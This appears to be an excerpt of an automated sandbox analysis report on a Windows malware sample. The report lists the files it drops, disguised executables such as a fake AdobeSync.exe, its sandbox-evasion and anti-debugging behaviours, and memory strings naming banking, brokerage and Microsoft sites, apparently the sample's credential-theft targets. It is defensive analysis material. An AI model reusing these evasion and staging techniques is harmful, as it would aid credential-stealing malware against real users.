Source: LVkAi4PBv6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LVkAi4PBv6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LVkAi4PBv6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LVkAi4PBv6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: LVkAi4PBv6.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x60e0b6
Source: eekxwchdkwfcah.5.drStatic PE information: real checksum: 0x27e8a5 should be: 0x27697f
Source: Quadruple.dll.2.drStatic PE information: real checksum: 0x4dc7e should be: 0x4a7b1
Source: bkpxojga.11.drStatic PE information: real checksum: 0x27e8a5 should be: 0x27697f
Source: AXE8SharedExpat.dll.3.drStatic PE information: real checksum: 0x32631 should be: 0x361f1
Source: LVkAi4PBv6.exeStatic PE information: real checksum: 0x0 should be: 0x6bd43c
Source: AXE8SharedExpat.dll.2.drStatic PE information: real checksum: 0x32631 should be: 0x361f1
Source: LVkAi4PBv6.exeStatic PE information: section name: .wixburn
Source: LVkAi4PBv6.exe.0.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: section name: Shared
Source: eekxwchdkwfcah.5.drStatic PE information: section name: .xdata
Source: eekxwchdkwfcah.5.drStatic PE information: section name: ubpux
Source: bkpxojga.11.drStatic PE information: section name: .xdata
Source: bkpxojga.11.drStatic PE information: section name: ubpux
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088EAD6 push ecx; ret 0_2_0088EAE9
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EEAD6 push ecx; ret 2_2_005EEAE9
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D370FB4 push ecx; ret 2_2_6D370FC6
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_00128249 push ecx; ret 3_2_0012825C
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_00128B07 push ecx; ret 3_2_00128B1A
Source: msvcr90.dll.2.drStatic PE information: section name: .text entropy: 6.9217598022130655
Source: msvcr90.dll.3.drStatic PE information: section name: .text entropy: 6.9217598022130655
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\sqlite.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dllJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCF\BIB.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BIB.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dllJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dllJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\eekxwchdkwfcahJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCF\AXE8SharedExpat.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bkpxojgaJump to dropped file
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dllJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeFile created: C:\Users\user\AppData\Roaming\PatchReaderWCF\sqlite.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\sqlite.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\BIB.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AXE8SharedExpat.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dllJump to dropped file
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile created: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\eekxwchdkwfcahJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bkpxojgaJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EEKXWCHDKWFCAH
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BKPXOJGA
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D36FBC5 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_6D36FBC5
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeAPI/Special instruction interceptor: Address: 6D557C44
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeAPI/Special instruction interceptor: Address: 6D557C44
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeAPI/Special instruction interceptor: Address: 6D557945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6D553B54
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeAPI/Special instruction interceptor: Address: 6D4A7C44
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeAPI/Special instruction interceptor: Address: 6D4A7945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6D4A3B54
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeDropped PE file which has not been started: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeDropped PE file which has not been started: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcp90.dllJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcp90.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eekxwchdkwfcahJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeDropped PE file which has not been started: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\Quadruple.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bkpxojgaJump to dropped file
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PatchReaderWCF\msvcr90.dllJump to dropped file
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeEvaded block: after key decision
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeEvaded block: after key decision
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeAPI coverage: 9.6 %
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe TID: 1008Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 4008Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6328Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 64Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0089FF61h0_2_0089FEC6
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0089FF5Ah0_2_0089FEC6
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 005FFF61h2_2_005FFEC6
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 005FFF5Ah2_2_005FFEC6
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00863CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00863CC4
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A4440 FindFirstFileW,FindClose,0_2_008A4440
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00897B87 FindFirstFileExW,0_2_00897B87
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00879B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00879B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_00604440 FindFirstFileW,FindClose,2_2_00604440
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,2_2_005D9B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F7B87 FindFirstFileExW,2_2_005F7B87
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_005C3CC4
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D36DCB0 GetWindowsDirectoryW,lstrcmpW,lstrlenW,lstrlenW,FindFirstFileW,lstrlenW,DeleteFileW,FindNextFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_6D36DCB0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37DB36 FindFirstFileExW,2_2_6D37DB36
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000BCE10 FindFirstFileW,3_2_000BCE10
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000BBB70 FindFirstFileW,GetFullPathNameW,GetLastError,FindFirstFileW,GetLastError,FindClose,_CxxThrowException,3_2_000BBB70
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A97A5 VirtualQuery,GetSystemInfo,0_2_008A97A5
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2152916730.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2161763361.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1790141711.0000000000642000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2181693786.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2161763361.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1790141711.0000000000634000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2152916730.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000634000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2129287330.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000634000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.000000000062E000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.00000000005CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088E88A
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_00061412 OutputDebugStringA,GetLastError,3_2_00061412
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008948D8 mov eax, dword ptr fs:[00000030h]0_2_008948D8
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F48D8 mov eax, dword ptr fs:[00000030h]2_2_005F48D8
